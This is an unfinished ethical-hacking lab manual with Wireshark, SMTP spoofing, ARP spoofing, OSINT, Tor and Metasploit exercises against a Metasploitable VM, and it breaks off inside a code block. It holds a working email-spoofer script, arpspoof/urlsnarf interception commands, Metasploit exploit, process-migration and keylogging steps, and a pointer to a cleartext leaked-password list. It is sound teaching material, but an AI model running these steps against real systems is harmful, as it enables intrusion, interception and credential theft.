Step 8 There are a lot of packets in the capture, so Wireshark provides a filter feature. Click on the filter box at the top of the screen and type the filter ip.dst==128.143.67.11 (where 128.143.67.11 is the IP address of the cs.virginia.edu web server; check it with the host command if it has changed).

Step 9 Limit the view to a single conversation by right-clicking on one of the packets and selecting Conversation Filter → TCP.

Step 10 Wireshark also lets you reconstruct the application data from the packet stream: right-click a packet and select Follow → TCP Stream. You should see the HTML corresponding to the page.



FIGURE 5.3: Filtering Packets on Wireshark

FIGURE 5.4: TCP conversation filtering

The Follow TCP Stream will look like the figure below:

5.3 Need to make this clearer. Need to make this section clearer.



FIGURE 5.5: Navigating to follow TCP stream on Wireshark

FIGURE 5.6: A screenshot of Follow TCP stream on Wireshark


6 Wireshark Part 2: Analyzing Malware Traffic

6.1 Introduction. In this section we will analyze network traffic from an infected machine. The goal is to analyze a Wireshark pcap file and identify when the machine was compromised.

In particular we will look at two types of attack: an ARP spoofing attack and a DNS attack.

6.2 Importing PCAP files into Wireshark. Step 1 Download the pcap file from our GitHub page.

[link to wireshark capture]

Step 2 Open Wireshark by clicking on the shark fin.

Step 3 Open the pcap file by selecting File → Open and navigating to the directory containing the pcap file.

#Scanning the Step 1 Upload the Wireshark capture to PacketTotal, https://packettotal.com/. PacketTotal scans the capture for malicious activity (it does a lot of the heavy lifting for us).

Step 2 Click on the malicious activities tag.

[Screen shot highligthing the entry corresponding to meterpreter]

Step 3






7 SMTP enumeration & email spoofing

##Background For this lab you are going to build an email address spoofer that speaks the SMTP protocol over TCP. Modern email servers have several defenses (such as SPF, DKIM and DMARC) that make spoofing harder. However, the SMTP protocol itself does not check that the message is coming from a valid server or that the email was actually written by the claimed sender. To demonstrate this, we will use the mail server on the Metasploitable machine.

##SMTP enumeration In an SMTP enumeration attack an attacker tries to get a list of valid email addresses (user accounts) from a server. Kali Linux has

Step 1 Determine the IP address of the Metasploitable machine using the ifconfig command. Username: msfadmin, password: msfadmin.

Step 2 Start the Metasploit console. Select the smtp_enum module by typing the following:

msf > use auxiliary/scanner/smtp/smtp_enum

Step 3 Set the host that you want to scan by typing the following. Replace the xxx.xxx.xxx.xxx IP address with the IP address of the Metasploitable machine.

msf auxiliary(smtp_enum) > set RHOSTS xxx.xxx.xxx.xxx

RHOSTS => 192.168.1.56

msf auxiliary(smtp_enum) > run

You should see a list of users on the server.

[Include screenshot below]




An attacker could use an SMTP enumeration attack to get the email addresses that exist on the server. In the following section we develop the software required to execute an SMTP spoofing attack against one of them.

7.1 Email Spoofing. Step 1. Download the free version of VMware Player. (You can also use VirtualBox if you already have it installed or just like it more.)

Step 2. Connect to the metasploitable server via telnet.

telnet xxx.xx.xx.x 25

where xx.xx.xx.x is the IP address of the metasploitable server.

Remember that you can get the address of the Metasploitable server by logging in (username msfadmin, password msfadmin) and running ifconfig.

The Metasploitable mail server will now let you talk to it directly over telnet. (The session is not encrypted, which makes it fun for snooping.)

Step 3 Follow the SMTP protocol (HELO, MAIL FROM, RCPT TO, DATA, QUIT) to send an email from [email protected]. (The figure below shows the result of the process.)

Great, now that we have a configured mail server that we can communicate with, let's write a TCP application that carries out the process for us.

Step 4 Open the IDE.

The code below shows an implementation of a program that executes the SMTP protocol over a TCP connection. Each command is terminated with CRLF as the protocol requires, and the response to each command is printed so you can see the server's reply codes.

```python
import sys, socket

size = 1024

def sendMessage(smtpServer, port, fromAddress, toAddress, message):
    IP = smtpServer
    PORT = int(port)

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((IP, PORT))                                    # open socket on port
    print(s.recv(size).decode())                             # display banner (220)
    s.send(b'HELO virginia.edu\r\n')                         # send HELO with a made-up host name
    print(s.recv(size).decode())                             # display response
    s.send(b'MAIL FROM:<' + fromAddress.encode() + b'>\r\n') # envelope sender: the server does not verify it
    print(s.recv(size).decode())                             # display response
    s.send(b'RCPT TO:<' + toAddress.encode() + b'>\r\n')     # send RCPT TO:
    print(s.recv(size).decode())                             # display response
    s.send(b"DATA\r\n")                                      # send DATA
    print(s.recv(size).decode())                             # display response (354: go ahead)
    s.send(message.encode() + b'\r\n')                       # send message
    s.send(b'.\r\n')                                         # a lone dot on a line ends the message
    print(s.recv(size).decode())                             # display response (250: queued)
    s.send(b'QUIT\r\n')                                      # send QUIT
    print(s.recv(size).decode())                             # display response
    s.close()

def main(args):
    smtpServer = args[1]
    port = args[2]
    fromAddress = args[3]
    toAddress = args[4]
    message = " ".join(args[5:])     # the message may contain spaces (see Step 7)
    sendMessage(smtpServer, port, fromAddress, toAddress, message)

if __name__ == "__main__":
    main(sys.argv)
```
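An added example (not the manual's code) showing both sides of the exchange that espoofer.py drives: a client that checks every reply code and dot-stuffs the body, and a toy SMTP responder, constructed for this example, that behaves like a server with no sender checks and simply records the envelope and the message. Note the two different "from" values, the envelope MAIL FROM and the From: header that the recipient's mail client displays; neither is verified. The host names, addresses and the run_local_demo() helper are assumptions for the demo; it runs over a socketpair, with no network.

```python
import socket
import threading

CRLF = b"\r\n"


def read_reply(reader):
    """Read one SMTP reply, including multi-line '250-...' replies; return (code, lines)."""
    lines = []
    while True:
        raw = reader.readline()
        if not raw:
            raise ConnectionError("server closed the connection")
        line = raw.rstrip(b"\r\n").decode()
        lines.append(line)
        if len(line) < 4 or line[3] != "-":      # '250 ' ends the reply, '250-' continues it
            return int(line[:3]), lines


def send_spoofed(sock, envelope_from, header_from, rcpt_to, subject, body, helo="virginia.edu"):
    """Drive the SMTP dialogue, checking every reply code. Returns [(command, code), ...]."""
    reader = sock.makefile("rb")
    transcript = []

    def step(command, expected):
        if command is not None:
            sock.sendall(command.encode() + CRLF)
        code, lines = read_reply(reader)
        transcript.append((command, code))
        if code != expected:
            raise RuntimeError(f"{command!r}: expected {expected}, got {lines}")

    step(None, 220)                                   # banner
    step("HELO " + helo, 250)                         # any host name is accepted
    step(f"MAIL FROM:<{envelope_from}>", 250)        # envelope sender: never verified
    step(f"RCPT TO:<{rcpt_to}>", 250)
    step("DATA", 354)
    headers = f"From: {header_from}\r\nTo: {rcpt_to}\r\nSubject: {subject}\r\n\r\n"
    # dot-stuffing: a body line starting with '.' is sent as '..' so it cannot end the message early
    stuffed = "\r\n".join(("." + l if l.startswith(".") else l) for l in body.split("\n"))
    step(headers + stuffed + "\r\n.", 250)            # '.' alone on a line terminates DATA
    step("QUIT", 221)
    return transcript


def toy_smtp_server(sock, mailbox):
    """Constructed responder with no sender checks: records envelope and message into mailbox."""
    reader = sock.makefile("rb")
    sock.sendall(b"220 toy.example ESMTP ready" + CRLF)
    envelope = {"mail_from": None, "rcpt_to": []}
    in_data, data_lines = False, []
    for raw in reader:
        line = raw.rstrip(b"\r\n").decode()
        if in_data:
            if line == ".":
                in_data = False
                mailbox.append({**envelope, "data": "\n".join(data_lines)})
                sock.sendall(b"250 2.0.0 Ok: queued" + CRLF)
            else:
                data_lines.append(line[1:] if line.startswith("..") else line)   # un-stuff
            continue
        verb = line.split(" ", 1)[0].upper()
        if verb in ("HELO", "EHLO"):
            sock.sendall(b"250 toy.example" + CRLF)
        elif verb == "MAIL":
            envelope["mail_from"] = line.split(":", 1)[1].strip("<> ")
            sock.sendall(b"250 2.1.0 Ok" + CRLF)
        elif verb == "RCPT":
            envelope["rcpt_to"].append(line.split(":", 1)[1].strip("<> "))
            sock.sendall(b"250 2.1.5 Ok" + CRLF)
        elif verb == "DATA":
            in_data = True
            sock.sendall(b"354 End data with <CR><LF>.<CR><LF>" + CRLF)
        elif verb == "QUIT":
            sock.sendall(b"221 2.0.0 Bye" + CRLF)
            break
        else:
            sock.sendall(b"502 5.5.2 Error: command not recognized" + CRLF)
    sock.close()


def run_local_demo(envelope_from, header_from, rcpt_to, subject, body):
    """Run client and toy server over a socketpair (no network); return (transcript, mailbox)."""
    client_end, server_end = socket.socketpair()
    mailbox = []
    server = threading.Thread(target=toy_smtp_server, args=(server_end, mailbox))
    server.start()
    transcript = send_spoofed(client_end, envelope_from, header_from, rcpt_to, subject, body)
    client_end.close()
    server.join()
    return transcript, mailbox
```

Against the Metasploitable server, replace the socketpair with socket.create_connection((ip, 25)) and call send_spoofed() on it; the reply codes you see printed by espoofer.py should match the expected values checked here.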



Step 5 Create a folder called spoofer on the Kali desktop and savethe program above to the folder and call it espoofer.py

Step 6 Open the terminal and cd to ~/Desktop/spoofer

Step 7 Run the spoofer by typing the following command into the terminal.

python espoofer.py [IP-Metasploitable] 25 [email protected] sys Hello From the other side

[Include screen shot]

##Checking that the email was correctly received.

Step 1 Login into the metasploitable server. Username: msfadminPassword: msfadmin

Step 2 Open the terminal and check the sys mailbox on the mail server by typing

sudo cat /var/spool/mail/sys

[Include a screen shot below]


8 ARP Spoofing

##Background In this lab we will discuss ARP spoofing. ARP spoofing is an attack in which an attacker tricks a victim into believing that the attacker is another machine, by pretending that the attacker's MAC address maps to an IP address that is not their own.

FIGURE 8.1: Shows the topology of the virtual lab you configured

VirtualBox emulates a virtual network with a virtual gateway. To determine the IP address of the default gateway you need to determine the IP address of the Kali Linux virtual machine and its subnet mask.

##Determining the router gateway.

Step 1 Determine the IP address and subnet mask by typing the ifconfig command.

[Include picture with subnetmask and ipaddress highlighted]

Step 2 Calculate the default gateway by ANDing the subnet mask with your IP address and adding 1. The result is the first usable address in the subnet, which is where VirtualBox's virtual gateway sits by convention (Step 3 below confirms it from the routing table):




                    decimal          binary
Kali IP             10.0.2.4         00001010 00000000 00000010 00000100
Subnet mask         255.255.255.0    11111111 11111111 11111111 00000000
Mask & IP           10.0.2.0         00001010 00000000 00000010 00000000
(Mask & IP) + 1     10.0.2.1         00001010 00000000 00000010 00000001

Great, now that we have determined the IP address of our virtual gateway, we can trick the Metasploitable machine on our virtual network into thinking that we are the default gateway, so that all of its outbound traffic is sent to our machine instead. We do this by sending ARP packets that falsely tell the Metasploitable machine that the MAC address of the Kali machine is associated with the IP address of the default gateway. The victim updates its ARP cache, and from then on every frame it addresses to the gateway is delivered to the Kali Linux box, which forwards it on (Step 4) so the victim notices nothing.

[Include ARP spoofing picture below]

Step 3 Type: ip route|grep default , get the router ip

Step 4 On your attacker type: echo '1' > /proc/sys/net/ipv4/ip_forward

Step 5 On the attacker type: arpspoof -i eth0 -t VICTIMIP ROUTERIP

Step 6 On the attacker, in another terminal type: urlsnarf -i eth0

Step 7 On the victim open Firefox and browse to some pages. If you've done everything right, you will now see the victim's traffic on the attacker.

Step 8 On the attacker, press Ctrl+C in the arpspoof terminal window; arpspoof restores the victim's ARP table and shuts down the attack.

##Analyzing the Network Traffic Associated with the ARP requests.

Close both VMs and open the packet capture in Wireshark. Look for the ARP messages between the attacker, victim and router: the tell-tale sign is the gateway's IP address being claimed by two different MAC addresses.
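An added detection example (not from the manual) for the analysis described above: a small classic-pcap reader that pulls the ARP replies out of a capture and reports any IP address claimed by more than one MAC address, which is exactly the trace arpspoof leaves behind. The capture is constructed inline with the lab's 10.0.2.x addresses and made-up MAC addresses; to use it on your own capture, read the file's bytes and pass them to find_arp_conflicts(). Only Ethernet (linktype 1) captures in the classic pcap format are handled, not pcapng.

```python
import struct
from collections import defaultdict

PCAP_MAGIC = 0xA1B2C3D4
ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an ARP 'is-at' reply, built from raw bytes."""
    eth = target_mac + sender_mac + struct.pack("!H", ETHERTYPE_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
           + sender_mac + sender_ip + target_mac + target_ip)
    return eth + arp


def build_pcap(frames_with_ts):
    """Write a classic little-endian pcap file (linktype 1 = Ethernet) in memory."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, 1)
    for ts_sec, frame in frames_with_ts:
        out += struct.pack("<IIII", ts_sec, 0, len(frame), len(frame)) + frame
    return out


def iter_pcap(data):
    """Yield (timestamp, frame_bytes) for every record; handles both byte orders."""
    if data[:4] == b"\xd4\xc3\xb2\xa1":
        order = "<"
    elif data[:4] == b"\xa1\xb2\xc3\xd4":
        order = ">"
    else:
        raise ValueError("not a classic pcap file")
    (linktype,) = struct.unpack(order + "I", data[20:24])
    if linktype != 1:
        raise ValueError("only Ethernet captures are handled")
    offset = 24
    while offset + 16 <= len(data):
        ts_sec, ts_usec, incl_len, _ = struct.unpack(order + "IIII", data[offset:offset + 16])
        offset += 16
        yield ts_sec + ts_usec / 1e6, data[offset:offset + incl_len]
        offset += incl_len


def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip) for an IPv4-over-Ethernet ARP frame, else None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    arp = frame[14:42]
    htype, ptype, hlen, plen, opcode = struct.unpack("!HHBBH", arp[:8])
    if htype != 1 or ptype != 0x0800 or hlen != 6 or plen != 4:
        return None
    return opcode, mac_str(arp[8:14]), ip_str(arp[14:18])


def find_arp_conflicts(pcap_bytes):
    """Map each IP to the MACs that claimed it in ARP replies (with the time of the
    first claim); return only the IPs claimed by more than one MAC."""
    claims = defaultdict(dict)            # ip -> {mac: first_seen_timestamp}
    for ts, frame in iter_pcap(pcap_bytes):
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != ARP_REPLY:
            continue
        _, mac, ip = parsed
        claims[ip].setdefault(mac, ts)
    return {ip: macs for ip, macs in claims.items() if len(macs) > 1}


# Constructed capture: the lab's addresses, made-up MACs. First a legitimate
# gateway reply, then the attacker's forged replies claiming the gateway's IP.
GATEWAY_MAC, GATEWAY_IP = bytes.fromhex("525400123501"), bytes([10, 0, 2, 1])
VICTIM_MAC, VICTIM_IP = bytes.fromhex("080027ddeeff"), bytes([10, 0, 2, 5])
KALI_MAC = bytes.fromhex("080027aabbcc")


def sample_capture():
    return build_pcap([
        (100, build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)),
        (101, build_arp_reply(VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP)),
        (130, build_arp_reply(KALI_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)),   # arpspoof
        (132, build_arp_reply(KALI_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)),
    ])


if __name__ == "__main__":
    for ip, macs in find_arp_conflicts(sample_capture()).items():
        print(ip, "claimed by", macs)
```

The same rule is what Wireshark's "duplicate use of IP address detected" expert-info warning implements; the script just makes the check explicit and scriptable over many captures.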


9 Open Source Intelligence

Searching is half the fun: life is much more manageable when thought of as a scavenger hunt as opposed to a surprise party.

9.1 Introduction. An important part of being a penetration tester is gathering as much information about the target systems as possible. In this lab we will explore several information gathering tools:

• DNS lookup tools (whois)
• theHarvester
• Maltego
• Password lists

9.2 WhoIs. Domain registrars keep information on the domains they host, and this information is publicly available. The whois Linux command lets you query it.

Step 1 Open the terminal and type: whois mit.edu

[Include screenshot]

The whois command returns the information that the domain registrar has on the domain. To begin collecting formation on the an their network.




9.3 The Harvester. theHarvester is a tool that lets you search Google, Bing, LinkedIn and PGP public key servers for email addresses and host names that belong to a specific domain.

Step 1 Open the terminal and type theharvester. You will see a list of all the options that theHarvester supports.

[include a screen shot]

Step 2 Run the following command in the linux terminal

theharvester -d microsoft -l 200 -b linkedin

This will list the first 200 results found by searching LinkedIn that are related to the Microsoft domain.

[Include screen shot]

9.4 Maltego: The next tool we will look at is Maltego, a link analysis tool that lets us analyze links between entities. These entities could be websites, domains, networks or people. Let's get started by setting up Maltego.

Step 1 Click on the maltego icon in Kali Linux.

[Include Screen Shot]

Step 2 Create an account. Don't use your real address; use http://www.mailinator.com to create a throwaway email account.

[If you get blocked, download Opera and enable its VPN: https://www.opera.com/computer/features/free-vpn]

[Include Screen Shot]



Step 3 Select the option to create a new graph.

[Include Screen]

Step 4 Add a domain entity to graph (enter mit.edu in the entity)

[Include Screen]

Step 5 Run all transforms on the entity.

[Include Screen Shot]

Step 6 Install the additional transforms by selecting Transforms → Transform Hub (install the haveibeenpwned transform).

[Include Screen Shot]

Step 7: Go back to the graph and run the haveibeenpwned transform on the people you have found.

[Screen Shot hide names]

9.5 List of compromised passwords. Great, you have run Maltego and discovered that someone's password is contained in one of these breach lists. The question now becomes: how do you obtain the list? A list of "clear text" pwned passwords is available here: https://github.com/philipperemy/tensorflow-1.4-billion-password-analysis (you will need a torrent client).

###BONUS section: Great hackers write their own tools. See if you can write a program that takes the email addresses output by theHarvester and tests them against the haveibeenpwned.com API. Here is the link to the API: https://haveibeenpwned.com/API/v2 . (The current version of the API, v3, requires an API key for the breach-by-email lookup.)
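An added example (not the manual's code) for the bonus above. Because the breach-by-email endpoint now needs a paid API key, this example uses the free Pwned Passwords range endpoint from the same service, which also shows the privacy-preserving design a good tool should copy: only the first five hex characters of the SHA-1 hash leave the machine, and the match is done locally against the returned suffix list. The endpoint URL and response format (SUFFIX:COUNT per line) are from the HIBP documentation; the sample response below is constructed and the count shown for "password" is made up.

```python
import hashlib
import urllib.request

# Pwned Passwords k-anonymity range endpoint (from the HIBP API documentation).
RANGE_URL = "https://api.pwnedpasswords.com/range/"


def sha1_prefix_suffix(password):
    """Split the uppercase hex SHA-1 of the password into the 5-char prefix
    that is sent to the service and the 35-char suffix that stays local."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def parse_range_response(body):
    """Parse 'SUFFIX:COUNT' lines (CRLF separated) into {suffix: count}.
    With the Add-Padding header the service mixes in fake entries with count 0."""
    counts = {}
    for line in body.splitlines():
        line = line.strip()
        if not line:
            continue
        suffix, count = line.split(":", 1)
        counts[suffix.upper()] = int(count)
    return counts


def breach_count_from_response(password, body):
    """Offline half of the check: look the local suffix up in a range response."""
    _, suffix = sha1_prefix_suffix(password)
    return parse_range_response(body).get(suffix, 0)


def breach_count(password, timeout=10):
    """Online check: fetch the range for the hash prefix, then match locally."""
    prefix, _ = sha1_prefix_suffix(password)
    request = urllib.request.Request(
        RANGE_URL + prefix,
        headers={"User-Agent": "ethical-hacking-manual-example", "Add-Padding": "true"},
    )
    with urllib.request.urlopen(request, timeout=timeout) as response:
        body = response.read().decode("utf-8")
    return breach_count_from_response(password, body)


# Constructed sample of what the range endpoint returns for prefix 5BAA6
# (the prefix of sha1("password")); the counts are invented for the demo.
SAMPLE_RANGE_RESPONSE = "\r\n".join([
    "1D2DA4053E34E76F6576ED1DA63134B5E2A:2",
    "1E4C9B93F3F0682250B6CF8331B7EE68FD8:3861493",   # suffix of sha1("password")
    "1E4C9B93F3F0682250B6CF8331B7EE68FD9:0",         # padding entry
])


if __name__ == "__main__":
    for candidate in ("password", "correct horse battery staple"):
        seen = breach_count_from_response(candidate, SAMPLE_RANGE_RESPONSE)
        print(f"{candidate!r}: seen {seen} times in the sample response")
```

To check a real password, call breach_count("..."): the only thing the service learns is a 5-character prefix shared by hundreds of hashes, which is why this pattern is acceptable even for passwords you are still using, whereas uploading a plaintext list would not be.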


10 Creating an Infected File

##Background In this section we will discuss the process of

##Creating

###MSFVenom

###Take Screen Shot

10.0.1 Capturing an image from the camera.

webcam_snap -i 1 -v false

[Include screen shot below]

10.1 Creating Malicious Files for Windows ##Creating a malicious PDF file

https://www.offensive-security.com/metasploit-unleashed/client-side-exploits/

10.2 Creating a malicious Android APK. In this section we show how you can generate a malicious Android APK.




10.3 EggShell iOS payload https://github.com/neoneggplant/EggShell


11 Communicating Securely

##Introduction

In this section we will discuss

##Secure Chat

##Encrypting Files.



12 Tor and Dark Web

12.1 Background. Tor is a network of computers that lets users browse the web anonymously. It works by relaying the user's traffic through a series of machines (relays). The receiving host can only tell that the traffic is coming from the last relay in the series (the exit); it does not learn which machine originated the traffic.

[Include picture of Tor network. Highlight Tor relays.] Paper: https://www.nrl.navy.mil/itd/chacs/dingledine-tor-second-generation-onion-router

12.2 Setting up a Tor virtual machine. Running Tor in a virtual machine is not secure, since the host can see all of the traffic associated with the virtual machine. It is best to run Tor from a USB drive.

Step 1 Download the Tor ISO image: https://www.torproject.org/download/download-easy.html

Step 2 Create a new virtual machine and install Tor. For a quick refresher, revisit the Getting Setup lab.




12.3 Anonymous Browsing. Step 3 Once you have finished setting up Tor, log in and launch the Iceweasel browser.

[Include screen shot of how to launch the Iceweasel browser]

Step 3 Once the Iceweasel browser starts you should see the following screen. Congratulations, you are now connected to the Tor network.

Step 4 www.shodan.io is a search engine for machines that are connected to the Internet. These machines could be IP cameras, web servers with open telnet ports, and so on. Try browsing anonymously to shodan.io.

Step 4 Search for the list of open IP cameras by typing webcams in the search box.

[Include screen shot]

Step 5 Click one of the ip-addresses [Include ]

##Tor hidden services and hidden sites. Some websites and services can only be accessed from inside the Tor network. Let's take a look at https://www.torproject.org/docs/onion-services.html.en

[Need to build and include a picture]

The database is stored in a distributed hash table. [Include a pic-ture discussing DHT]


13 Metasploit

13.1 Background. Metasploit is a framework developed by Rapid7. In this section we will walk through the steps an attacker would take to break into a web server and the database containing the passwords for the website.

13.2 Using Exploits. Step 1 Start up the Metasploitable virtual machine (this is the web server we attack in this exercise). Get the IP address of the Metasploitable machine by logging in with username: msfadmin, password: msfadmin and running the ifconfig command. Write it down; you will need it for the next step.

[Include Screen Shot]

Step 2 Click on the Metasploit Icon [Include picture]

[Include screen shot Metasploit Console]

Step 3 The Metasploit Framework is comprised of a collection of modules. These modules contain code designed to execute a particular exploit. In a later lab we explore how modules are implemented by writing our own; for this lab we will use an existing module. We will begin by loading the module that executes the FTP exploit (this runs the attack from chapter 2):

use exploit/unix/ftp/vsftpd_234_backdoor

[include screen shot]

Step 4 Next you need to set the IP address of the target that you want to attack. The option for this is RHOSTS (TARGET selects a variant of the exploit, not the host):

set RHOSTS <target-ip>

Step 4 Run the command below to launch the exploit and get a session on the target. (The vsftpd backdoor module gives you a plain command shell, not a Meterpreter session; the Meterpreter-only commands in the following sections, such as migrate and keyscan, need a Meterpreter payload.)

exploit

[include screenshot ]

13.3 Hide the Meterpreter process by migrating it. Once the hacker has uploaded a Meterpreter payload they don't want the user to notice the process and kill it, so they often hide Meterpreter by migrating it into another, long-lived process.

Step 5 Get a list of the process by running the ps command ps[include screenshot]

Step 6 Migrate into one of the listed processes by running

migrate 682 [update the PID to match a process in your list]

13.4 Exploring the file system. Great, now that you have run the exploit and obtained a session, you have a remote shell that lets you explore the file system on the web server.



Step 5 Run the pwd command. Notice that it prints the currentdirectory of the program.

[include screenshot]

Step 6 Navigate to directory containing the database file by run-ning the following command

cd /var/lib/mysql/ [include screenshot]

Step 7 Download one of the database files by running the com-mand below:

download [filename] [Include screen shot]

13.5 Key Logging. Great, you have been able to successfully get the database file from the system. But you don't know the admin password for the system. Knowing it would make it very convenient to log back into the system, and even into other systems, without creating too much noise.

[Meterpreter only logs keystrokes for the process that it is currently running in.] Step 8 Start a keylogger so that you can collect usernames and passwords from the system, by running the

[Include Screen shot]

**Step 9** Test the keylogger by logging into the metasploitable virtual machine and running the sudo command. (Username: msfadmin, password: msfadmin)

[Include screenshot]

**Step 7** Open the window containing the Meterpreter session. Run the command ```keyscan_dump```. Notice anything? [Include screenshot below]




#Writing a Metasploit module

##Background

##Setup **Step 1** Open the terminal and navigate to the Metasploit module directory by running ```cd ~/.msf4/modules```

**Step 2** Open Visual studio code. (If you haven't )


# Secure Sockets SSL and TLS

## Background In this section we discuss the TLS security protocol in detail. We will go through the protocol step by step, and also use Wireshark to look at a sample TLS session. For additional details on TLS you can read the TLS 1.2 specification, RFC 5246: https://tools.ietf.org/html/rfc5246#section-8.1.2.


13.5 Key Logging 67

### Key Exchange

### How are keys derived from the Pre-Master Secret?

The length of the pre-master secret varies depending on the type of key exchange algorithm that is used. However, to ensure that each message is both authentic and confidential, we need a fixed-length message authentication code (MAC) key and a fixed-length encryption key, and we need these keys for both the client and the server. TLS solves this by deriving a fixed-length master secret from the variable-length pre-master secret.

```
master_secret = PRF(pre_master_secret, "master secret",
                    ClientHello.random + ServerHello.random)[0..47];
```

From this master secret, TLS then derives a key block that is cut up into four keys (the lengths come from the negotiated cipher suite):

```
client_write_MAC_key[SecurityParameters.mac_key_length]
server_write_MAC_key[SecurityParameters.mac_key_length]
client_write_key[SecurityParameters.enc_key_length]
server_write_key[SecurityParameters.enc_key_length]
```

The PRF used in both steps is defined as:

```
PRF(secret, label, seed) = P_<hash>(secret, label + seed)

P_hash(secret, seed) = HMAC_hash(secret, A(1) + seed) +
                       HMAC_hash(secret, A(2) + seed) +
                       HMAC_hash(secret, A(3) + seed) + ...
```

where + indicates concatenation and A() is defined as:

```
A(0) = seed
A(i) = HMAC_hash(secret, A(i-1))
```

HMAC = Hash-based Message Authentication Code.

The code below shows a sample Python program that implements the PRF function above:


```python
import hmac
import hashlib

def PRF(secret, label, seed, length=48):
    """TLS 1.2 PRF with SHA-256: P_SHA256(secret, label + seed), cut to `length` bytes.
    secret, label and seed are bytes; 48 bytes is the master secret length."""
    seed = label + seed                    # label and seed are concatenated once
    a = seed                               # A(0) = seed
    masterkey = b''
    while len(masterkey) < length:
        a = hmac.new(secret, a, hashlib.sha256).digest()                 # A(i) = HMAC(secret, A(i-1))
        masterkey += hmac.new(secret, a + seed, hashlib.sha256).digest()  # HMAC(secret, A(i) + seed)
    return masterkey[:length]
```
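As an added example (not the book's own code), the block below carries the derivation through from a pre-master secret to the four write keys named above, using the key lengths of TLS_RSA_WITH_AES_128_CBC_SHA (20-byte HMAC-SHA1 MAC keys, 16-byte AES keys). The pre-master secret and both randoms are constructed sample values, not a captured session.

```python
import hmac
import hashlib

# Added example (not from the book): the TLS 1.2 key schedule carried
# through from a pre-master secret to the four write keys. The randoms and
# the pre-master secret below are constructed sample values, not a capture.

def prf_sha256(secret: bytes, label: bytes, seed: bytes, length: int) -> bytes:
    """PRF(secret, label, seed) = P_SHA256(secret, label + seed), cut to `length` bytes."""
    seed = label + seed
    a, out = seed, b""                                   # A(0) = seed
    while len(out) < length:
        a = hmac.new(secret, a, hashlib.sha256).digest()            # A(i) = HMAC(secret, A(i-1))
        out += hmac.new(secret, a + seed, hashlib.sha256).digest()  # HMAC(secret, A(i) + seed)
    return out[:length]

def master_secret(pre_master: bytes, client_random: bytes, server_random: bytes) -> bytes:
    # master_secret = PRF(pre_master_secret, "master secret",
    #                     ClientHello.random + ServerHello.random)[0..47]
    return prf_sha256(pre_master, b"master secret", client_random + server_random, 48)

def key_block(master: bytes, client_random: bytes, server_random: bytes,
              mac_key_length: int, enc_key_length: int) -> dict:
    """Expand the master secret and cut the key block into the four write keys."""
    # Key expansion concatenates the randoms server-first, the reverse of the
    # master-secret step; getting this order wrong is a classic interop bug.
    total = 2 * mac_key_length + 2 * enc_key_length
    block = prf_sha256(master, b"key expansion", server_random + client_random, total)
    layout = (("client_write_MAC_key", mac_key_length), ("server_write_MAC_key", mac_key_length),
              ("client_write_key", enc_key_length), ("server_write_key", enc_key_length))
    keys, pos = {}, 0
    for name, n in layout:
        keys[name], pos = block[pos:pos + n], pos + n
    return keys

# Constructed sample inputs (an RSA pre-master secret is 48 bytes).
PRE_MASTER = bytes(range(48))
CLIENT_RANDOM = b"\x11" * 32
SERVER_RANDOM = b"\x22" * 32

def demo():
    ms = master_secret(PRE_MASTER, CLIENT_RANDOM, SERVER_RANDOM)
    # TLS_RSA_WITH_AES_128_CBC_SHA: 20-byte HMAC-SHA1 MAC keys, 16-byte AES keys.
    return ms, key_block(ms, CLIENT_RANDOM, SERVER_RANDOM, mac_key_length=20, enc_key_length=16)

if __name__ == "__main__":
    ms, keys = demo()
    print("master_secret:", ms.hex())
    for name, key in keys.items():
        print(f"{name:22s} {key.hex()}")
```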

## 13.6 Writing an SSL Client

```python
import socket
import ssl

hostname = 'www.python.org'
context = ssl.create_default_context()  # verifies the certificate chain and the hostname
sock = socket.create_connection((hostname, 443))
secureSocket = context.wrap_socket(sock, server_hostname=hostname)  # the TLS handshake happens here
print(secureSocket.version(), secureSocket.cipher())
# An HTTPS server sends nothing until it receives a request, so send one before
# reading; SSLSocket does not support recvfrom(), so use recv().
secureSocket.sendall(b'HEAD / HTTP/1.0\r\nHost: ' + hostname.encode() + b'\r\n\r\n')
print(secureSocket.recv(1024))
secureSocket.close()
```

## Writing an SSL server

```python
import socket
import ssl

context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain('/path/to/certchain.pem', '/path/to/private.key')
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock.bind(('127.0.0.1', 8443))
sock.listen(1)
secureSocket = context.wrap_socket(sock, server_side=True)
conn, addr = secureSocket.accept()  # the TLS handshake completes inside accept()
print('connection from', addr, 'using', conn.version())
conn.sendall(b'hello over TLS\n')
conn.close()
```


## 13.7 Challenge

Now that we have discussed TLS, you can try running SMTP spoof over a TLS connection.


# 14 Moving through the network

## Domain controller

In this lab we extend upd

## Golden Ticket Attacks (Kiwi)


# 15 Writing Malicious JavaScript

In this lab we will write malicious JavaScript.

## 15.1 Obfuscating Code

After a hacker has written some malicious code, they often want to make it difficult for someone to reverse engineer their malware. This is done through a process called obfuscation. There are several approaches to obfuscation.

base64 encoding.

Other obfuscation tools:

https://obfuscator.io/
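As an added example (not from the book), the Python script below is a triage helper for the base64 approach just mentioned: it finds base64-looking string literals in a script, decodes them, reports the ones that decode to JavaScript, and flags whether the script hands decoded text to `eval`. The sample script it scans is constructed for this example.

```python
import base64
import binascii
import re

# Added example (not from the book): find base64-encoded string literals in
# JavaScript and decode them, so an analyst can see what a base64-"obfuscated"
# script actually runs. SAMPLE_JS is constructed for this example.

SAMPLE_JS = r"""
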